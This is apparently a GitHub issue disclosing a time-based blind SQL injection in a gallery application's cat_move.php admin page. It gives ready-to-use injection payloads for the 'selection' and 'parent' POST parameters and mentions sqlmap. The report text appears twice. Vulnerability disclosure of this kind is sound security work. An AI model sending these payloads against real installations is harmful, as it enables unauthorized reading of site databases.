Hi, I found a sql injection vulnerability in cat_move.php:
The 'move_categories' method is called when moving the album in '/admin.php?page=cat_move', but the method does not validate and filter the 'selection' and 'parent' parameters, thus causing the vulnerability.
replace any of the following parameter in POST requests to reappear the vulnerability: selection%5B%5D=1)` and if(ascii(substr(database(),1,1))>300,1,sleep(5));%23
or parent=1 and if(ascii(substr(database(),1,1))>300,1,sleep(5));%23
I use 'sqlmap' to reappear the vulnerability:
The text was updated successfully, but these errors were encountered:
Hi, I found a sql injection vulnerability in cat_move.php:
The 'move_categories' method is called when moving the album in '/admin.php?page=cat_move', but the method does not validate and filter the 'selection' and 'parent' parameters, thus causing the vulnerability.
replace any of the following parameter in POST requests to reappear the vulnerability:
selection%5B%5D=1)` and if(ascii(substr(database(),1,1))>300,1,sleep(5));%23or
parent=1 and if(ascii(substr(database(),1,1))>300,1,sleep(5));%23I use 'sqlmap' to reappear the vulnerability:


The text was updated successfully, but these errors were encountered: